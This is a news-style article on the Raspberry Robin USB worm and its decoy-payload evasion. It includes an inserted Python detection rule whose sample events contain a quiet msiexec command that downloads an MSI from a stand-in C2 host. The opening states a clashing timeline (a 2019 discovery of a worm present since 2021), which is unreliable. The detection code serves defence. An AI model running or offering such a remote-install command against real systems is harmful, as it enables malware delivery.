Raspberry Robin Malware Caught Using a Clever Trick to Deceive Security Analysts

In early 2019, researchers from the threat intelligence firm Red Canary discovered an infectious computer worm that had been present in customers’ environments since September 2021. According to a later analysis by Microsoft, this malware, dubbed “Raspberry Robin” by researchers, may date as far back as 2019 and has since integrated with a larger ecosystem of malware. New research by Trend Micro has uncovered an updated version of Raspberry Robin, which began spreading in September through telecommunications and government systems. This new variant attempts to deceive security researchers by hiding its true payload and deploying a dummy payload when it detects active security tools.

Raspberry Robin is classified as a computer worm by cybersecurity analysts due to its self-replicating nature. This worm spreads by copying itself from an infected machine to any attached USB drives, then infecting any future machines that connect to those USB drives. Raspberry Robin may not propagate as rapidly as worms that spread over the Internet or a local area network (LAN), but its spread via USB drives makes it hazardous in other ways. The worm can remain dormant on USB drives for extended periods, then reinfect previously infected computers. USB drive transmission also enables Raspberry Robin to traverse air gaps and infect systems without network access, such as offline archives containing sensitive data. If the worm employs data-destroying malware like ransomware, such an infection could be catastrophic.

Researchers have observed Raspberry Robin deploying a variety of malicious payloads, frequently as part of multi-stage infection chains that can result in ransomware deployment. According to Microsoft, this worm has become one of the largest malware distribution platforms, and threat actors may be paying Raspberry Robin’s developers to install specific payloads on infected machines. Therefore, Raspberry Robin has assumed the role of a malware dropper, infecting computers to install additional malware.

Unfortunately, Raspberry Robin can be difficult even for security researchers to detect and identify, let alone for anti-virus software. The worm’s infection chain begins with a .LNK shortcut file on a USB flash drive. When the drive is connected to a Windows system and the user double-clicks the shortcut, an executable runs that instructs the legitimate msiexec.exe Windows Installer service to download and install a malicious .MSI package. This package contains a significant portion of the Raspberry Robin malware.
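A defender-side check for the msiexec stage described above, added here as an illustration and not taken from the Trend Micro or Microsoft reports: a small detection rule run over constructed Sysmon-style process-creation records. The domain, file paths and the assumption that C: is the system drive are all made up for the example.

```python
import re

# Constructed Sysmon-style process-creation records (not from the article); only the fields the rule needs.
SAMPLE_EVENTS = [
    {   # suspicious: package pulled over HTTP, quiet mode, launched from a USB drive
        "Image": "C:\\Windows\\System32\\msiexec.exe",
        "CommandLine": "msiexec.exe /q /i http://placeholder-c2.example/pkg.msi",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "CurrentDirectory": "E:\\",
    },
    {   # benign: local MSI install from the user's Downloads folder
        "Image": "C:\\Windows\\System32\\msiexec.exe",
        "CommandLine": "msiexec.exe /i C:\\Users\\alice\\Downloads\\setup.msi",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "CurrentDirectory": "C:\\Users\\alice\\Downloads",
    },
    {   # benign: the Windows Installer service instance started by services.exe
        "Image": "C:\\Windows\\System32\\msiexec.exe",
        "CommandLine": "C:\\Windows\\system32\\msiexec.exe /V",
        "ParentImage": "C:\\Windows\\System32\\services.exe",
        "CurrentDirectory": "C:\\Windows\\system32\\",
    },
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
QUIET_RE = re.compile(r"(?:^|\s)/q", re.IGNORECASE)
NON_SYSTEM_DRIVE_RE = re.compile(r"^[D-Z]:\\", re.IGNORECASE)  # assumption: C: is the system drive


def msiexec_remote_install_reasons(event):
    """Reasons the event matches; an empty list means no alert."""
    # Core condition: msiexec.exe handed a URL instead of a local package path.
    if not event["Image"].lower().endswith("\\msiexec.exe"):
        return []
    cmd = event["CommandLine"]
    if not URL_RE.search(cmd):
        return []
    reasons = ["msiexec.exe fetching an MSI package from a remote URL"]
    if QUIET_RE.search(cmd):
        reasons.append("quiet (/q) install suppresses the installer UI")
    if event["ParentImage"].lower().endswith("\\explorer.exe"):
        reasons.append("launched from the user shell, consistent with a double-clicked LNK")
    if NON_SYSTEM_DRIVE_RE.match(event["CurrentDirectory"]):
        reasons.append("working directory on a non-system drive (possible removable media)")
    return reasons


def detect(events):
    """Map event index -> reasons for every event that matches the rule."""
    return {i: r for i, ev in enumerate(events) if (r := msiexec_remote_install_reasons(ev))}
```

Only the first record is flagged; the local install and the service instance pass because msiexec is never given a URL.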

However, the malicious code is concealed by more than ten layers of obfuscation. At runtime, each layer of the malware works to sequentially unpack and decrypt the subsequent layer. When this process reaches the payload loader, the loader looks for sandboxing and security analytics tools. If such tools are detected, the loader decompresses and loads a bogus payload intended to deceive security researchers. Before downloading and installing adware, this bogus payload collects and exfiltrates system information. It is possible for security researchers observing this behavior to be misled into believing they have determined the full extent of the malware’s activity.

When the payload loader detects that neither a sandbox nor security analytics tools are active, it unpacks and loads the significantly more malicious real payload. This payload modifies the Windows registry to elevate its privileges, evade detection, and establish persistence on the compromised system by abusing the user’s admin permissions. It also contains a Tor client that the malware uses to communicate with command-and-control (C2) servers controlled by the threat actors behind Raspberry Robin. Once the threat actors have established a backdoor into an infected system, they can send additional malicious payloads for the malware to install and execute.

This new variant of Raspberry Robin demonstrates how far threat actors will go to create malware that can evade detection by security researchers and anti-virus software. To avoid becoming the next victim of this worm and others like it, users and organizations should always remain vigilant and avoid opening unfamiliar files, even if they appear to be safe upon inspection.


The article above was written by the BestTopReviewsOnline team, which includes many of the US’s most knowledgeable technical experts. Our team includes well-known writers with extensive experience in mobile phones, computing, technology, photography, and other fields.


© 2022 BestTopReviewsOnline.com Pty. Ltd. All Rights Reserved.